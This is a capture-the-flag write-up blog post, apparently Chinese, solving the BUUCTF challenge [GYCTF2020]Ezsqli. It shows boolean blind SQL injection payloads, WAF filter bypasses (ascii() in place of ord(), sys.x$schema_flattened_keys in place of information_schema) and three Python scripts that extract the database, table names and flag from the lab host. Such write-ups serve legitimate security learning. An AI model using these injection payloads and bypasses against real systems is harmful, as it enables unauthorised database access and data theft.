「配枪朱丽叶。」 「配枪朱丽叶。」
  • 🏠 INDEX
  • 🚩 CTF
    • WEB
    • CRYPTO
    • MISC
  • 🌐 SITE
    • BUUCTF
    • XCTF
    • CTF.SHOW
    • BMZCTF
    • VULNHUB
    • BUGKU
    • HACKTHEBOX
  • 📔 NOTE
    • 学习笔记
    • 工具分享
    • 漏洞复现
  • 👩‍💻 ABOUT ME
  • 💬 COMMENT
  • 🏠 INDEX
  • 🚩 CTF
    • WEB
    • CRYPTO
    • MISC
  • 🌐 SITE
    • BUUCTF
    • XCTF
    • CTF.SHOW
    • BMZCTF
    • VULNHUB
    • BUGKU
    • HACKTHEBOX
  • 📔 NOTE
    • 学习笔记
    • 工具分享
    • 漏洞复现
  • 👩‍💻 ABOUT ME
  • 💬 COMMENT
我的主页 › 靶场 › BUUCTF › [GYCTF2020]Ezsqli2 min read
#BUUCTF#

[GYCTF2020]Ezsqli2 min read

4月前
73 0

id=1时提示:

Nu1L

id=2时提示:

V&N

id=0(不存在)时提示:

Error Occured When Fetch Result.

触发WAF时提示:

SQL Injection Checked.

输入if(0,1,2),因为0是false,所以等同id=2,输出V&N

输入if(1,1,2),因为1是true,所以等同id=1,输出Nu1L

判断当前数据库名长度,等于21时返回Nu1L,证明语句为真:

if((length(database()))=21,1,2)

“if(ord”这个组合拳被过滤掉了,把ord()改为ascii()就好:

import requests
url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
payload1 = "if((ascii(substr(database(),"
payload2 = ",1))="
payload3 = "),1,2)"
name = ""
for i in range(1,22):
    for j in range(23,123):
        payload = payload1+str(i)+payload2+str(j)+payload3
        data = {'id':payload}
        s = requests.post(url,data=data).text
        if ("Nu1L" in s):
            name += chr(j)
            print(name)
            break

得到库名为give_grandpa_pa_pa_pa。继续爆表名,information_schema被过滤了,查了下资料,可以用sys.x$schema_flattened_keys代替

判断表名长度,等于39时返回Nu1L,证明语句为真:

if((select(length(group_concat(TABLE_NAME)))from(sys.x$schema_flattened_keys)where(table_schema=database()))=39,1,2)

爆表:

import requests
url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
payload1 = "if((ascii(substr((select(group_concat(TABLE_NAME))from(sys.x$schema_flattened_keys)where(table_schema=database())),"
payload2 = ",1))="
payload3 = "),1,2)"
name = ""
for i in range(1,40):
    for j in range(23,123):
        payload = payload1+str(i)+payload2+str(j)+payload3
        data = {'id':payload}
        s = requests.post(url,data=data).text
        if ("Nu1L" in s):
            name += chr(j)
            print(name)
            break

得到两个表名:f1ag_1s_h3r3_hhhhh,users233333333333333

正常应该爆列名,因为information_schema被过滤懒得搞直接猜测flag在flag列里了。。稍微改了下长度,为了快点换成了小字典。

import requests
url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
payload1 = "if(ascii(substr((select(flag)from(f1ag_1s_h3r3_hhhhh)),"
payload2 = ",1))="
payload3 = ",1,2)"
name = ""
dic = "qwertyuioplkjhgfdsazxcvbnmQAZWSXEDCRFVTGBYHNUJMIKOLP1234567890-{}"
for i in range(1,50):
    for j in dic:
        payload = payload1+str(i)+payload2+str(ord(j))+payload3
        data = {'id':payload}
        s = requests.post(url,data=data).text
        if ("Nu1L" in s):
            name += j
            print(name)
            break
0 0
Shaw Root
# buuctf# sql注入
相关文章
virink_2019_files_share
[Vulnhub]GoldenEye: 1靶机通关记录
[SUCTF 2019]EasyWeb
[BMZCTF]WEB_ezphp
通过一道校赛题学习过滤单引号的注入
头像
Shaw Root站长
> 缓慢又笨拙的路上,谢谢你们陪我长大。
144文章 0评论 128获赞
随便看看:)
[INSHack2017]rsa16m
12月前
[SWPU2019]Web3
2月前
[SUCTF 2019]EasyWeb
2周前
[XMAN2018排位赛]file
12月前
[Vulnhub]DC-4靶机通关记录
4月前
  • 旧站
  • 我的知乎
  • Riro
  • 7i4n2h3n9
  • EDS
  • 熵增
  • 紫哥purplet
  • 夏风
  • N0vice
  • Ga1@xy
  • prontosil
  • FzWjScJ
  • Retr_0
  • L1near
  • 1p0ch
  • β-AS
  • Match
  • Dizzyk
  • Y1ng
  • 偏有宸机
  • Van1sh
  • Fstone
  • Kali’s Blog
  • Airtail
  • False
  • 魔法少女雪殇
Copyright © 2020-2021 「配枪朱丽叶。」. Designed by nicetheme. 百度统计 载入天数... 载入时分秒...